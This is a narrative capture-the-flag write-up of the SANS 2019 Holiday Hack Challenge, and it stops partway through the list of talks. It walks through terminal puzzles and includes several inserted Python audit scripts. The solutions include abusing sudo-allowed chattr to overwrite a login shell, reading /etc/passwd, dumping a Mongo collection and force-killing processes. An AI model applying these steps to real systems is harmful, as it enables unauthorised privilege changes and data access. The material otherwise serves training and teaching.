SANS 2019 Holiday Hack Challenge – KringleCon 2: Turtle Doves

A Story-Writeup by: Chris Ruggieri
Table of Contents:

Prologue:  Welcome to Elf University!

           Challenge 1: Ed Escape

Chapter 1:  Finding the Turtle Doves

           Challenge 2: Smart Braces

Chapter 2:  Hermey Hall

           Challenge 3:  Linux Path

           Challenge 4:  Nyanshell

           Challenge 5:  Mongo Pilfer

           Challenge 6:  XMAS Cheer Laser

           Talks

Chapter 3:  Unredacting a Threatening Document

Chapter 4:  Windows Log Analysis: Evaluate Attack Outcome

Chapter 5:  Windows Log Analysis: Determine Attacker Technique

Chapter 6:  Network Log Analysis: Determine Compromised System

Chapter 7:  Splunk

Chapter 8:  Get Access to the Steam Tunnels

           Challenge 7:  Frosty Keypad

           Challenge 8:  Graylog

           Challenge 9:  Holiday Hack Trail

Chapter 9:  Bypassing the Frido Sleigh CAPTEHA

Chapter 10:  Retrieve Scraps of Paper from Server

Chapter 11:  Recover Cleartext Document

Chapter 12:  Open the Sleigh Shop Door

Chapter 13:  Filter Out Poisoned Sources of Weather Data

           Challenge 10:  Zeek JSON Analysis

KringleCon Narrative

References

Prologue:  Welcome to Elf University!

       The jarring of the train car and the sound of screeching brakes startled me awake.  We had finally arrived at the North Pole.  As the train finished pulling into the platform, I glanced down at the strange invitation that I had received.

       The situation sounded dire indeed.  As we disembark the train, we are met with the sight of a nondescript train station much like any other, but I notice two things almost immediately.  The first is a large jolly-looking man in a red suit at the exit of the platform and the other is an elf bemoaning something on his laptop.  “Well, he’s on the way to the big guy and it is Christmas. Let’s see if I can help.” I thought. So, I headed to the elf to offer my assistance.  “Anything I can help with?  I’m kind of new here” I ask.  “Hi, I’m Bushy Evergreen. Welcome to Elf U! I’m glad you’re here. I’m the target of a terrible trick. Pepper Minstix is at it again, sticking me in a text editor. Pepper is forcing me to learn ed. Even the hint is ugly. Why can’t I just use Gedit? Please help me just quit the grinchy thing.” Bushy seemed quite stressed.  So, I hop on the terminal to see what the problem is.

Challenge 1: Ed Escape

Challenge URL:  https://docker2019.kringlecon.com/?challenge=edescape

Challenge Objective:  Escape Ed Text Editor

Terminal Start:

Ed is an older text editor.  The solution is to enter Q to Quit [1].

Achievement Unlocked: Ed Escape - You have completed the Escape Ed challenge!

       “Here you go!” as I hand the laptop back to Mr. Evergreen.  “Wow, that was much easier than I’d thought. Maybe I don’t need a clunky GUI after all! Have you taken a look at the password spray attack artifacts? I’ll bet that DeepBlueCLI tool is helpful. You can check it out on GitHub [2]. It was written by that Eric Conrad [3]. He lives in Maine - not too far from here!” he responded.  “Thanks!  I’ll definitely take a look at that, but for now it’s time to meet the big guy.”  By then, Mr. Evergreen’s attention was elsewhere.  Marching up to the big man himself, “Hey Santa!  I got here as quickly as I could.” 

 

       “Welcome to the North Pole and KringleCon 2!  Last year, KringleCon hosted over 17,500 attendees and my castle got a little crowded.  We moved the event to Elf University (Elf U for short), the North Pole’s largest venue.  Please feel free to explore, watch talks, and enjoy the con!” and with Santa’s words our story had truly begun.

Chapter 1: Finding the Turtle Doves

 

The Quad

       Striding through that archway and onto the Elf University grounds, I come face to face with none other than Santa again.  I turn back to look under the arch thinking “Wow. For a big guy, he’s fast!  I guess that kind of makes sense. How else could he deliver all those presents in one night?” Let’s see what he has to say. “This is a little embarrassing, but I need your help. Our KringleCon turtle dove mascots are missing! They probably just wandered off. Can you please help find them? To help you search for them and get acquainted with KringleCon, I’ve created some objectives for you. You can see them in your badge.” Santa asks, obviously worried for his turtle doves.  “Sure. I’ll look for them.” I reply, hurrying away to begin the search.  Looking around the Quad, I can see to the left is Hermey Hall, to the right are the Dormitories, where an elf seems to be having trouble with a keypad, and straight ahead is the Student Union.  Looking around the grounds of the Quad itself, a strange object catches my eye in the back-left corner of the grounds.  It’s a redacted letter.  I pick it up as it will surely be important later.  Since I am this close to the Student Union, let’s look there first.

Objective 0 Completed – Talk to Santa in the Quad
 
The Student Union

       In the Student Union, several things jump out immediately.  There are booths for Google [4], SANS [5], Splunk [6], and a swag shop [7] (oh nice! Merch!), a door to the Sleigh Shop that is locked with an elf guarding it watching everyone intently, another elf holding his jaw in one hand and his laptop in the other obviously distressed, and lo and behold two turtle doves sitting by the fireplace.  Michael and Jane are the Turtle Doves’ names, and they seem content to sit by the fire.

Objective 1 Completed – Find the Turtle Doves
Achievement Unlocked: Find Two Turtle Doves - Thank you for finding our two turtle doves!

       I’ll let Santa know that they are alright, but first this new distressed elf is concerning me.  “Hey, is everything alright?  You seem worried.” I ask him.  “OK, this is starting to freak me out! Oh sorry, I’m Kent Tinseltooth. My Smart Braces are acting up. Do… Do you ever get the feeling you can hear things? Like, voices? I know, I sound crazy, but ever since I got these… Oh! Do you think you could take a look at my Smart Braces terminal? I’ll bet you can keep other students out of my head, so to speak. It might just take a bit of Iptables work.” Kent stammers out nervously.  “Sure!  Let me take a look” I reply hopping on his terminal.

Challenge 2: Smart Braces

Challenge URL:  https://docker2019.kringlecon.com/?challenge=iptables

Challenge Objective:  Checking IOTteethBraces.md in /home/elfuser/, I need to configure iptables to match the configuration below.  This challenge is timed: I have 5 minutes to complete it.

A proper configuration for the Smart Braces should be exactly:

  1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
  2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
  3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
  4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
  5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
  6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.

Terminal Start:

Since this challenge is timed, I wrote the iptables commands before starting the terminal so they could be pasted in [8].  The commands are:

sudo iptables -P INPUT DROP

sudo iptables -P FORWARD DROP

sudo iptables -P OUTPUT DROP

sudo iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

sudo iptables -A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

sudo iptables -A INPUT -s 172.19.0.225 -p tcp --dport 22 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT

sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

sudo iptables -A INPUT -i lo -j ACCEPT

Pasting the commands as one uninterrupted block runs them sequentially.  All 10 commands ran successfully, and I was given the following success message.

Achievement Unlocked: Smart Braces - You have completed the Smart Braces challenge!
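As an added check (my own Python, not part of the original writeup or the challenge), the function below audits the text that iptables -S prints against the six requirements above, so the result of the paste can be verified rather than assumed. Both rulesets are constructed samples; the second shows the findings for a braces firewall whose SSH rule was written without a source address.

```python
import shlex
import sys

# Constructed sample: what `iptables -S` prints after the ten commands from the
# challenge are applied (iptables normalises -s to /32 and inserts -m tcp).
COMPLIANT_RULESET = """\
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT DROP
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -s 172.19.0.225/32 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 21 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -i lo -j ACCEPT
"""

# Constructed sample of a misconfigured braces firewall: SSH accepted from any
# source, OUTPUT policy left at ACCEPT, no OUTPUT conntrack rule, no lo rule.
WEAK_RULESET = """\
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 21 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 80 -j ACCEPT
"""

SSH_ONLY_FROM = "172.19.0.225/32"  # the one host allowed to manage the braces


def parse_ruleset(text):
    """Parse `iptables -S` output into (policies, rules).

    policies maps chain -> policy; each rule is a dict holding the chain and
    every option as key -> value (flag-only options map to True, and an option
    preceded by '!' is stored under the key '!<option>' so negation is kept).
    """
    policies, rules = {}, []
    for line in text.splitlines():
        tokens = shlex.split(line)
        if not tokens:
            continue
        if tokens[0] == "-P" and len(tokens) == 3:
            policies[tokens[1]] = tokens[2]
        elif tokens[0] == "-A" and len(tokens) >= 2:
            rule, i, negate = {"chain": tokens[1]}, 2, False
            while i < len(tokens):
                opt = tokens[i]
                if opt == "!":
                    negate, i = True, i + 1
                    continue
                key = "!" + opt if negate else opt
                negate = False
                nxt = tokens[i + 1] if i + 1 < len(tokens) else "-"
                if not nxt.startswith("-") and nxt != "!":
                    rule[key], i = nxt, i + 2
                else:
                    rule[key], i = True, i + 1
            rules.append(rule)
    return policies, rules


def _has_rule(rules, **want):
    """True if some rule carries every key/value in `want`."""
    return any(all(r.get(k) == v for k, v in want.items()) for r in rules)


def audit_braces_firewall(text):
    """Return a list of findings; an empty list means all six requirements hold."""
    policies, rules = parse_ruleset(text)
    findings = []
    for chain in ("INPUT", "FORWARD", "OUTPUT"):
        if policies.get(chain) != "DROP":
            findings.append(f"{chain} policy is {policies.get(chain, 'unset')}, expected DROP")
    for chain in ("INPUT", "OUTPUT"):
        if not _has_rule(rules, chain=chain, **{"--ctstate": "RELATED,ESTABLISHED", "-j": "ACCEPT"}):
            findings.append(f"{chain} lacks a RELATED,ESTABLISHED ACCEPT rule")
    ssh = {"-p": "tcp", "--dport": "22", "-j": "ACCEPT"}
    if not _has_rule(rules, chain="INPUT", **{**ssh, "-s": SSH_ONLY_FROM}):
        findings.append(f"no INPUT rule accepting SSH (22) from {SSH_ONLY_FROM} only")
    # The requirement is "only" that host: a bare --dport 22 ACCEPT undoes it.
    for r in rules:
        if r["chain"] == "INPUT" and all(r.get(k) == v for k, v in ssh.items()) and "-s" not in r:
            findings.append("SSH (22) is accepted from any source address")
    for port in ("21", "80"):
        if not _has_rule(rules, chain="INPUT", **{"-p": "tcp", "--dport": port, "-j": "ACCEPT"}):
            findings.append(f"no INPUT rule accepting TCP port {port}")
    if not _has_rule(rules, chain="OUTPUT", **{"-p": "tcp", "--dport": "80", "-j": "ACCEPT"}):
        findings.append("no OUTPUT rule accepting TCP port 80")
    if not _has_rule(rules, chain="INPUT", **{"-i": "lo", "-j": "ACCEPT"}):
        findings.append("no INPUT rule accepting traffic on lo")
    return findings


if __name__ == "__main__":
    # On the box itself: sudo iptables -S | python3 audit_braces.py
    text = sys.stdin.read() if not sys.stdin.isatty() else WEAK_RULESET
    for finding in audit_braces_firewall(text) or ["ruleset matches the Smart Braces spec"]:
        print(finding)
```

When the same rules are applied over SSH rather than on a local console, add the ESTABLISHED,RELATED rules before switching the policies to DROP, or the session typing the commands is cut off halfway through the paste.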

       Smiling, I hand the terminal back to Kent. “Oh thank you! It’s so nice to be back in my own head again. Er, alone. By the way, have you tried to get into the crate in the Student Union? It has an interesting set of locks. There are funny rhymes, references to perspective, and odd mentions of eggs! And if you think the stuff in your browser looks strange, you should see the page source… Special tools? No, I don’t think you’ll need any extra tooling for those locks. BUT - I’m pretty sure you’ll need to use Chrome’s developer tools for that one [9]. Or sorry, you’re a Firefox fan [10]? Yeah, Safari’s fine too - I just have an ineffible hunger for a physical Esc key [11]. Edge [12]? That’s cool. Hm? No no, I was thinking of an unrelated thing. Curl fan [13]? Right on! Just remember: the Windows one doesn’t like double quotes. Old school, huh? Oh sure - I’ve got what you need right here…[14]” I can tell Kent is over the moon that his smart braces aren’t talking to him anymore.  I wonder what he means about this crate.  I’ll have to look into that later, but for now, I need to let Santa know his doves are ok.

The Quad

Running back up to Santa, I quickly let the big guy know his turtle doves are safe and by the fire in the Student Union. “Thank you for finding Jane and Michael, our two turtle doves!  I’ve got an uneasy feeling about how they disappeared.  Turtle doves wouldn’t wander off like that.  Someone must have stolen them! Please help us find the thief!  It’s a moral imperative!  I think you should look for an entrance to the steam tunnels and solve Challenge 6 and 7 too!  Gosh, I can’t help but think:  Winds in the East, snow coming in…  Like something is brewing and about to begin!  Can’t put my finger on what lies in store, but I fear what’s to happen all happened before!” Santa replies.  I guess it’s time to explore and dig into this mystery.  With that, I head for Hermey Hall.

Chapter 2:  Hermey Hall

       Hermey Hall is obviously where all the lectures happen but there’s more.  There’s a NetWars room, a Speaker Un-Preparedness Room, a Laboratory, and an elf staring at their laptop like it’s growing two heads.  This should be interesting.  “Hi.  I’m Chris. You seem to be having trouble.  What’s up?” SugarPlum Mary’s flustered reply, “Oh me oh my - I need some help!  I need to review some files in my Linux terminal, but I can't get a file listing.  I know the command is ls, but it's really acting up.  Do you think you could help me out? As you work on this, think about these questions:

  1. Do the words in green have special significance?
  2. How can I find a file with a specific name?
  3. What happens if there are multiple executables with the same name in my $PATH?”
Challenge 3:  Linux Path

Challenge URL:  https://docker2019.kringlecon.com/?challenge=path

Challenge Objective: List files in Users HOME directory

Terminal Start:

Running ls prints “This is not the ls you are looking for”, and whereis ls shows two different locations, /usr/local/bin/ls and /bin/ls.  The output of echo $PATH shows that /usr/local/bin comes before /bin, so the shell finds the impostor first [15].  Now, there are two methods to complete this challenge.  Running export PATH=/bin replaces all of the extraneous paths and fixes the problem for the rest of the session, as seen below.

However, hackers are sometimes lazy creatures.  Once we know the correct ls is located at /bin/ls, we could just run /bin/ls.

Achievement Unlocked: Linux Path – You have completed the Linux Path Challenge!
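To make the shadowing visible without relying on a single whereis, here is an added Python check (mine, not part of the original writeup) that walks PATH in order, reports every command name that exists in more than one directory, and shows which copy wins. The tree it builds under a temp directory is a constructed stand-in for the challenge box.

```python
import os
import stat
import tempfile


def resolve(name, path_value):
    """Return the path a POSIX shell would execute for `name`, or None.

    Lookup walks PATH left to right and stops at the first executable regular
    file, which is why a planted copy earlier on PATH wins over /bin/ls.
    """
    for directory in path_value.split(os.pathsep):
        full = os.path.join(directory, name)
        if directory and os.path.isfile(full) and os.access(full, os.X_OK):
            return full
    return None


def shadowed_commands(path_value):
    """Map each command present in more than one PATH directory to the ordered
    list of copies; index 0 is the copy that resolve() would return."""
    seen = {}
    for directory in path_value.split(os.pathsep):
        if not directory or not os.path.isdir(directory):
            continue
        for entry in sorted(os.listdir(directory)):
            full = os.path.join(directory, entry)
            if os.path.isfile(full) and os.access(full, os.X_OK):
                seen.setdefault(entry, []).append(full)
    return {name: copies for name, copies in seen.items() if len(copies) > 1}


def build_demo_tree():
    """Constructed stand-in for the challenge box: a fake ls in a directory that
    precedes the real one on PATH. Returns (path_value, root_dir)."""
    root = tempfile.mkdtemp(prefix="pathdemo-")
    fake_dir = os.path.join(root, "usr", "local", "bin")
    real_dir = os.path.join(root, "bin")
    scripts = {
        fake_dir: "#!/bin/sh\necho 'This is not the ls you are looking for'\n",
        real_dir: "#!/bin/sh\necho 'real ls would run here'\n",
    }
    for directory, body in scripts.items():
        os.makedirs(directory)
        target = os.path.join(directory, "ls")
        with open(target, "w") as handle:
            handle.write(body)
        os.chmod(target, os.stat(target).st_mode | stat.S_IXUSR)
    return os.pathsep.join([fake_dir, real_dir]), root


if __name__ == "__main__":
    path_value, root = build_demo_tree()
    print("ls resolves to:", resolve("ls", path_value))
    for name, copies in shadowed_commands(path_value).items():
        print(f"{name} is shadowed: {copies[0]} hides {', '.join(copies[1:])}")
    # The writeup's fix, export PATH=/bin, narrows PATH to the real directory:
    print("after fix:", resolve("ls", os.path.join(root, "bin")))
```

On a real host, run shadowed_commands against the login PATH and review every hit; a second copy of a core utility in a user-writable directory is the pattern this challenge demonstrates.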

       I have helped another elf and spread Holiday Cheer in the process!  Handing SugarPlum Mary back his terminal, he smiles with glee. “Oh there they are! Now I can delete them. Thanks! Have you tried the Sysmon and EQL challenge?  If you aren't familiar with Sysmon, Carlos Perez has some great info about it [16].  Haven't heard of the Event Query Language?  Check out some of Ross Wolf's work on EQL or that blog post by Josh Wright in your badge [17,18].”

Speaker UNpreparedness Room

      I decided that I would look around and explore the rest of Hermey Hall and see what other troubles that I can help fix.  After all, that’s why Santa asked us to come.  I decided to start with the Speaker UNpreparedness Room.  The only thing in this room was a lone elf with his laptop and a long table.  I decide to strike up a conversation with the room’s only other occupant and hopefully see if I can discover any new information or challenges.  “Hey!  I’m Chris.  How’s it going?” “Welcome to the Speaker UNpreparedness Room! My name’s Alabaster Snowball and I could use a hand. I’m trying to log into this terminal, but something’s gone horribly wrong. Every time I try to log in, I get accosted with … a hatted cat and a toaster pastry? I thought my shell was Bash, not flying feline. When I try to overwrite it with something else, I get permission errors. Have you heard any chatter about immutable files? And what is sudo -l telling me?” he replies.  Interesting. A cat, permissions errors, chatter about immutability, and something about a toaster pastry definitely sounds like fun.  Wait. “Chatter about immutable files?”  Surely, he doesn’t mean change attributes or chattr? I hop onto the terminal to see what I can find.

Challenge 4:  NyanCat Shell

Challenge URL:  https://docker2019.kringlecon.com/?challenge=nyanshell

Challenge Objective:  Change user to alabaster_snowball with the Password of password2 and land in a Bash shell prompt

Terminal Start:

Let’s see what the problem is when we substitute user as alabaster_snowball.

Cute, but useless.  What elevated commands can we run? sudo -l shows we can run chattr as root [19]. So, that is definitely the “chatter” Alabaster is talking about.  Printing out /etc/passwd, we can see that Alabaster’s account has had its shell changed to /bin/nsh and with lsattr /bin/nsh we can see that it is immutable [20].  All evidence that we are on the right track.

So, first let’s remove the immutability with:

sudo chattr -i /bin/nsh

Then, let’s overwrite the now-writable nsh with a copy of Bash:

cat /bin/bash > /bin/nsh

Then let’s try substituting user again.  Success!

Achievement Unlocked: NYANSHELL – You have completed the Nyanshell Challenge!
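As an added defender-side check (my own Python, not from the writeup), this audits the tampering the challenge shows: an account whose login shell is not listed in /etc/shells, cross-referenced with lsattr output to flag a shell binary that was made immutable. The passwd, shells and lsattr excerpts are constructed samples modelled on the challenge box.

```python
# Constructed excerpt of /etc/passwd modelled on the challenge box.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
elf:x:1000:1000::/home/elf:/bin/bash
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh
"""

# Constructed /etc/shells: the shells an administrator actually approved.
SHELLS = """\
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/dash
"""

# Constructed `lsattr` output for the shells named in PASSWD; the lowercase 'i'
# is the immutable attribute that `sudo chattr -i` removed in the challenge.
LSATTR = """\
--------------e------- /bin/bash
--------------e------- /bin/sh
----i---------e------- /bin/nsh
"""

# Shells that legitimately deny login and therefore never appear in /etc/shells.
NON_LOGIN = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def valid_shells(shells_text):
    """Set of shells listed in /etc/shells, ignoring comments and blank lines."""
    return {l.strip() for l in shells_text.splitlines() if l.strip() and not l.startswith("#")}


def immutable_files(lsattr_text):
    """Set of paths whose lsattr flags include the immutable attribute."""
    found = set()
    for line in lsattr_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            found.add(parts[1].strip())
    return found


def audit_login_shells(passwd_text, shells_text, lsattr_text=""):
    """Return one finding per account whose login shell is not an approved one.

    An empty seventh field means /bin/sh, as login(1) treats it.
    """
    allowed = valid_shells(shells_text) | NON_LOGIN
    immutable = immutable_files(lsattr_text)
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        user, shell = fields[0], fields[6] or "/bin/sh"
        if shell not in allowed:
            note = " and the binary is immutable" if shell in immutable else ""
            findings.append(f"{user}: login shell {shell} is not in /etc/shells{note}")
    return findings


if __name__ == "__main__":
    for finding in audit_login_shells(PASSWD, SHELLS, LSATTR):
        print(finding)
```

On a live host, feed it the real /etc/passwd and /etc/shells plus `lsattr` run over every distinct shell path; the same sudo -l review the challenge relies on is worth doing too, since a NOPASSWD chattr is what made the immutable shell removable here.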

       “Another one down!” I think, smiling and handing Alabaster back his terminal. “Who would do such a thing?? Well, it IS a good-looking cat. Have you heard about the Frido Sleigh contest? There are some serious prizes up for grabs. The content is strictly for elves. Only elves can pass the CAPTEHA challenge required to enter. I heard there was a talk at KCII about using machine learning to defeat challenges like this [21]. I don’t think anything could ever beat an elf though!” Frido Sleigh Contest with a CAPTEHA huh?  That sounds like fun. 

NetWars Room

       I leave the Speaker UNpreparedness Room and head next door to the NetWars room.  Sure enough, there’s an exasperated elf standing in the corner hammering away at his terminal, frantically trying to figure something out.  “Excuse me.  I’m Chris. I couldn’t help but notice that you’re having a problem there.  Anything that I can help with?” “Hey! It’s me, Holly Evergreen! My teacher has been locked out of the quiz database and can’t remember the right solution. Without access to the answer, none of our quizzes will get graded. Can we help get back in to find that solution? I tried lsof -i, but that tool doesn’t seem to be installed. I think there’s a tool like ps that’ll help too. What are the flags I need? Either way, you’ll need to know a teensy bit of Mongo once you’re in. Pretty please find us the solution to the quiz!”

Challenge 5: Mongo Pilfer

Challenge URL:  https://docker2019.kringlecon.com/?challenge=mongo

Challenge Objective:  Find the Quiz Solution so the quizzes can get graded

Terminal Start:

Using sudo -l, we quickly see that mongo is not running on the standard port.  So, instead we mongo localhost:12121

What databases and collections do we find [22]?  Well, we are at Elf University.  So, let’s run show dbs, use elfu, and show collections.

Then, it’s just a matter of dumping the solution collection with db.solution.find({}).  The output points to a command set off by stars; running db.loadServerScripts();displaySolution(); gets us a nice Christmas Tree.

Achievement Unlocked: Mongo Pilfer – You have completed the Mongo Pilfer challenge!

       With another challenge completed, I hand the terminal back to Holly. “Woohoo! Fantabulous! I’ll be the coolest elf in class. On a completely unrelated note, digital rights management can bring a hacking elf down. That ElfScrow one can really be a hassle. It’s a good thing Ron Bowes is giving a talk on reverse engineering [23]! That guy knows how to rip a thing apart. It’s like he breathes opcodes!” he exclaims!  I believe that reverse engineering comment will come back into play later.  As I leave the NetWars room, I decide to take a look inside of the Laboratory before I go through the all the different Talk Tracks.  So, I head straight for the laboratory.

Laboratory

       Server racks everywhere and a strange laser were the first things that I saw upon entering the Laboratory.  People were everywhere watching an elf frantically fiddling with his terminal, and others were speaking to another elf standing by the server racks.  You could tell something wasn’t right with the laser, so I decided to start there.  Time to see if I can help.  “Hey there.  You look like you need some help.  What can I do?” I ask the elf near the laser.  “I’m Sparkle Redberry and Imma chargin’ my laser! Problem is: the settings are off. Do you know any PowerShell? It’d be GREAT if you could hop in and recalibrate this thing. It spreads holiday cheer across the Earth … … when it’s working!” Sparkle’s reply was clearly flustered.  I hop onto the terminal to see what the problem is.

Challenge 6: XMAS CHEER LASER

Challenge URL:  https://docker2019.kringlecon.com/?challenge=powershell

Challenge Objective:  Recalibrate the laser to the correct refraction, angle, temperature, and gas mixtures so that the output is 5 Mega-Jollies per liter

Terminal Start:

Well, apparently the culprit left a calling card.  Let’s see what it says with

Get-Content /home/callingcard.txt

It alludes to a clue in command history.  For PowerShell [24], that’s

Get-History

Let’s see what that says.

It appears I have my first value.  The angle should be 65.5.  I’ll save that for later.  The mention of a name=value variable shared system-wide could be a reference to the environment variables.  Let’s check there with

Set-Location ENV:

and then dir to see what’s there.

Sure enough, there’s another clue.  Get-Content riddle will grab the whole thing for us.

“Squeezed and compressed I am hidden away. Expand me from my prison and I will show you the way. Recurse through all /etc and Sort on my LastWriteTime to reveal im the newest of all.”

Squeezed and compressed?  Expand me from my prison?  An archive file!  So, I need to search for the most recently written archive file.  I can do that with

gci -rec -file | sort LastWriteTime -Descending | select-object fullname,lastwritetime

So, change to the /etc directory and run it.  The file I need is /etc/apt/archive.  It looks like this PowerShell environment is running against a Linux filesystem.  That is odd.  Let’s expand that archive to /tmp with

Expand-Archive -Path /etc/apt/archive -DestinationPath /tmp/expanded

and then change directory to /tmp/expanded.  There is a refraction directory with two files in it, riddle and runme.elf.  The runme.elf file isn’t executable as delivered.  Since this is a Linux filesystem, let’s see if I can run chmod +x against it to make it executable.  Success!  Let’s Get-Content riddle while I’m here.

Refraction value is 1.867, and the next clue can be found by comparing the MD5 hash of a file in /home/elf.  Inside of /home/elf is a folder called depths.  Let me get the MD5 hash value of every file in there with

Get-ChildItem -Path ./ -Recurse -File | Get-FileHash -Algorithm MD5 | Export-Csv -Path /tmp/data.xml

Then I can select just the file I need with

Get-Content /tmp/data.xml | Select-String "25520151A320B5B0D21561F92C8F6224"

and I get the result of

"MD5","25520151A320B5B0D21561F92C8F6224","/home/elf/depths/produce/thhy5hll.txt"

Get-Content /home/elf/depths/produce/thhy5hll.txt

gives me the temperature value and the next clue.  Excellent!

So, temperature is -33.5 degrees Celsius.  Now, let’s look for that FullName with

dir ./ -file -recurse | select FullName,@{Name="NameLength";Expression={$_.FullName.Length}} | sort NameLength -Descending | Export-Csv -Path /tmp/data1.xml

get-content /tmp/data1.xml | select -First 2

I get a response value of

"FullName","NameLength"
"/home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt","388"

and Get-Content gives me the next clue.  “Wow. Garrus made recalibrating lasers look so much easier than this” I thought.

Running

get-process * -IncludeUserName | Export-Csv -Path /tmp/procs.csv

get-content /tmp/procs.csv | sort UserName

will get me a huge list of all the processes and which user is running each, but it is hard to read in the terminal.  So, I copied and pasted it into a CSV table parser [25] to determine that the ID order is 23, 72, 78, and 84.  So, I run:

Stop-Process -ID 23 -Force
Stop-Process -ID 72 -Force
Stop-Process -ID 78 -Force
Stop-Process -ID 84 -Force

and then try to change to the /shall directory and Get-Content the file there to see what it says.

I need to search through /etc for an XML log file.  I can do that with

Get-ChildItem -Recurse -Path /etc | Export-Csv -Path /tmp/etc.csv

and then

Get-Content /tmp/etc.csv | Select-String -Pattern "event"

which gives me the result:

"Microsoft.PowerShell.Core\FileSystem::/etc/systemd/system/timers.target.wants/EventLog.xml","Microsoft.PowerShell.Core\FileSystem::/etc/systemd/system/timers.target.wants","EventLog.xml","/","Microsoft.PowerShell.Core\FileSystem","False","--r---","EventLog",,,,,"/etc/systemd/system/timers.target.wants/EventLog.xml",".xml","EventLog.xml","True","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","11/18/19 7:53:24 PM","ReadOnly"

I’ve never had much luck parsing XML in PowerShell, so let’s convert it to CSV with

Import-Clixml /etc/systemd/system/timers.target.wants/EventLog.xml | Export-Csv /tmp/event.csv

and then search for our last values, the gases, with

Get-Content /tmp/event.csv | Select-String "gas"

Our last values are O=6; H=7; He=3; N=4; Ne=22; Ar=11; Xe=10; F=20; Kr=8; Rn=9.  Now, at the very beginning of this challenge, we saw that (Invoke-WebRequest -Uri http://localhost:1225/).RawContent would provide us with some API info.  Let’s see what that is.

Sounds easy enough.  Let’s build the commands.  I’ve always had better luck with a POST body when I pre-store it as a variable.  So, I will use:

$params = @{
    O='6'
    H='7'
    He='3'
    N='4'
    Ne='22'
    Ar='11'
    Xe='10'
    F='20'
    Kr='8'
    Rn='9'
}

Now, let me build the rest of the commands:

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/off).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/refraction?val=1.867).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/angle?val=65.5).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/gas -Method Post -Body $params).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/on).RawContent

(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/output).RawContent

OK!  Let’s see what happens!  Success! 

Achievement Unlocked:  XMAS Cheer Laser – You have completed the XMAS Cheer Laser Challenge!

       As I hand the terminal back over to Sparkle, he exclaims, “You got it - three cheers for cheer! For objective 5, have you taken a look at our Zeek logs? Something’s gone wrong. But I hear someone named Rita can help us [26]. Can you and she figure out what happened?” 

             

       Let’s go see what the elf near the server racks has to say.  “Good morning, sir!” I cheerily greet.  “Hi, I’m Dr. Banas, professor of Cheerology at Elf University. This term, I’m teaching HOL 404: The Search for Holiday Cheer in Popular Culture, and I’ve had quite a shock! I was at home enjoying a nice cup of Gløgg when I had a call from Kent, one of my students who interns at the Elf U SOC. Kent said that my computer has been hacking other computers on campus and that I needed to fix it ASAP! If I don’t, he will have to report the incident to the boss of the SOC. Apparently, I can find out more information from this website https://splunk.elfu.org/ with the username: elf / Password: elfsocks. I don’t know anything about computer security. Can you please help me?”  With that, Objective 6 opens for me to attempt.  “I need to go back to Objectives 3-5 first” I think.  So, I head back out to the main hall to see what else awaits.  There appear to be seven (7) Talk Track rooms up ahead.

Talks:
Talk Track Room 1:

 

Welcome to KringleCon 2:  Turtle Doves – Ed Skoudis

 

       Ed Skoudis presents a welcome to KringleCon with tips on how to use your badge, solve objectives, and get hints through terminal challenges. Also, he talks about the missing Turtle Doves and how YOU can help solve that crisis [27].

 

Keynote:  A Hunting We Must Go – John Strand

 

       In this talk, John will cover some of the interesting things he has discovered while doing Threat Hunts for his customers. He will also share free tools to get this done. Why??? Because giving is the reason for the season [28].

 

Talk Track Room 2:

 

How to (Holiday) Hack It:  Tips for Crushing CTFs & Pwning Pentests – Katie Knowles

 

